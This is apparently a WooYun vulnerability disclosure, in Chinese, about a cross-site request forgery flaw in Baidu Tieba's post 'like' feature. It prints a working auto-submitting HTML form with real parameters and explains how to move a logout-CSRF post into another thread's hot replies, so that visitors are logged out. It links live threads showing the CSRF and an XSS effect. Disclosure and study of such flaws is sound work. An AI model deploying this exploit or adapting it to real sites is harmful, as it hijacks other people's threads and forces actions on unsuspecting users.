WooYun.org

1.晚上在逛贴吧，一个功能引起了我的注意，就是里面有个点赞的功能，于是我想测试下这个功能有没有漏洞

2.于是，抓包得到，点赞的请求，弄成了一个表单

<html>
<body>
<form id="csrf" name="csrf" action="http://tieba.baidu.com/godthread/likePost" method="POST">
<input type="text" name="forum_id" value="33333333333333333" />
<input type="text" name="thread_id" value="689776012" />
<input type="text" name="post_id" value="63786815341" />
<input type="text" name="post_no" value="10" />
<input type="text" name="tbs" value="363bc849d7735abd1429369319" />
</form>
<script>
	document.csrf.submit();
</script>
</body>
</html>

3.其中参数
①forum_id这个参数不会影响点赞，但是不能没有,随便打
②thread_id代表点赞的帖子
③post_id这个参数代表楼层ID(可以修改成别的帖子的楼层ID，这样就可以转移到上面设置的帖子参数的帖子里面了)
④post_no这个参数代表楼层,数值越大越好
⑤tbs这个代表自己的tbs,填写自己的(可以运行PageData.tbs查看自己的tbs)
4.这个点赞存在的漏洞的地方就是，测试的时候发现，可以把别的帖子的楼层点的赞，移动到当前的帖子，而且测试的时候发现，越后面的楼层越容易被当成热门回帖，意思就是当post_no楼层参数越后面，然后你的回复就会被放到热门回帖,这个就是为什么上面我说post_no参数越大越好

5.知道了这个问题，就轮到自由发挥了，如果在别吧，发一个CSRF帖，然后把CSRF的楼层移动到热门回帖会怎么样??于是，我在自己吧发了一个掉线CSRF，然后得到楼层id=67195850670,如图

6.然后填写好表单访问，我贴吧的CSRF帖子被转到楼主的帖子里面去了，所以只要访问那个楼主的帖子=访问我的CSRF帖子，一代背锅侠诞生了,如图

7.看吧，楼主是一楼，我直接插在二楼和一楼之间，只要别人访问楼主的帖子的就退出登录了

8.这个漏洞就是黄图哥的天下了
9.可以访问:http://tieba.baidu.com/p/3709639872 这个帖子看CSRF效果，楼主的帖子被修改成CSRF帖子了
--------------------------------------------------------------------------
10.可以访问:http://tieba.baidu.com/p/3562395246 这个帖子看XSS效果，楼主的帖子的帖子被修改成XSS帖子了